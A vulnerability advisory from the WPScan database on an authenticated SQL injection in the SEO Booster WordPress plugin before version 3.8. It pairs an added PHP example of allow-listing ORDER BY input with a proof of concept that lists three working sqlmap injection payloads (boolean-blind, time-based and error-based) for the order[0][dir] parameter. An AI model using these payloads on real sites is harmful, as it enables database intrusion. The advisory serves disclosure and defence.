wpvulndb | Anton Sarsadskikh | WPVDB-ID:40849D93-8949-4BD0-B60E-C0330B385FEA
Nov 15, 2021 - 12:00 a.m.

SEO Booster < 3.8 - Admin+ SQL Injection

2021-11-15 00:00:00
Anton Sarsadskikh
wpscan.com
8

EPSS: 0.001 (Low)
Percentile: 38.5%

The plugin allows authenticated SQL injection via the "fn_my_ajaxified_dataloader_ajax" AJAX request: the $_REQUEST['order'][0]['dir'] parameter is not properly escaped, leading to blind and error-based SQL injections.
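
A sort direction is an SQL keyword, so it cannot be bound as a query parameter and has to be chosen from an allow-list. The following is an added example of that pattern, not SEO Booster's code or the vendor's fix; the function name, the column map and the order[0][column] key (DataTables convention) are assumptions.

```php
<?php
// Added example: hypothetical helper, not the plugin's own code.
// Builds an ORDER BY clause from a DataTables-style request such as
// order[0][column]=2&order[0][dir]=desc without ever copying request
// text into the SQL string.

/**
 * @param array  $request Raw request array (e.g. $_REQUEST).
 * @param array  $columns Allow-list: DataTables column index => SQL column name.
 * @param string $default Fallback ordering when input is missing or invalid.
 */
function safe_order_by(array $request, array $columns, string $default = 'id DESC'): string
{
    $order = $request['order'][0] ?? null;
    if (!is_array($order)) {
        return "ORDER BY $default";
    }

    // Column: must be a non-negative integer index present in the allow-list.
    $idx = $order['column'] ?? null;
    if (!is_scalar($idx) || !ctype_digit((string) $idx) || !isset($columns[(int) $idx])) {
        return "ORDER BY $default";
    }

    // Direction: exact match against the legal keyword. Anything else,
    // including a value that merely starts with "desc", becomes ASC.
    $dir = $order['dir'] ?? '';
    $dir = (is_string($dir) && strtolower($dir) === 'desc') ? 'DESC' : 'ASC';

    // Only strings from $columns and the two literals above reach the query.
    return 'ORDER BY ' . $columns[(int) $idx] . ' ' . $dir;
}

// Constructed sample input (column names are illustrative).
$columns  = [0 => 'id', 1 => 'keyword', 2 => 'visits'];
$benign   = ['order' => [['column' => '2', 'dir' => 'desc']]];
$tampered = ['order' => [['column' => '2', 'dir' => 'desc,(SELECT 1)']]];
$badcol   = ['order' => [['column' => 'visits--', 'dir' => 'asc']]];

foreach ([$benign, $tampered, $badcol] as $req) {
    echo safe_order_by($req, $columns), PHP_EOL;
}
```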

PoC

Install SEO Booster, then click on the "Incoming Keywords" link in the WordPress administrative interface. An AJAX request called "fn_my_ajaxified_dataloader_ajax" will be generated and sent. Intercept it and modify the order[0][dir] parameter to achieve different types of SQL injections.

Sqlmap vectors:

1. Type: boolean-based blind
   order[0][dir]=desc,(SELECT (CASE WHEN (1081=1081) THEN 1 ELSE 1081*(SELECT 1081 FROM INFORMATION_SCHEMA.PLUGINS) END))

2. Type: time-based blind
   order[0][dir]=desc PROCEDURE ANALYSE(EXTRACTVALUE(8553,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x4b686547))))),1)#

3. Type: error-based
   order[0][dir]=desc,(SELECT 9426 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(9426=9426,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

CPE
Name         Operator  Version
seo-booster  lt        3.8
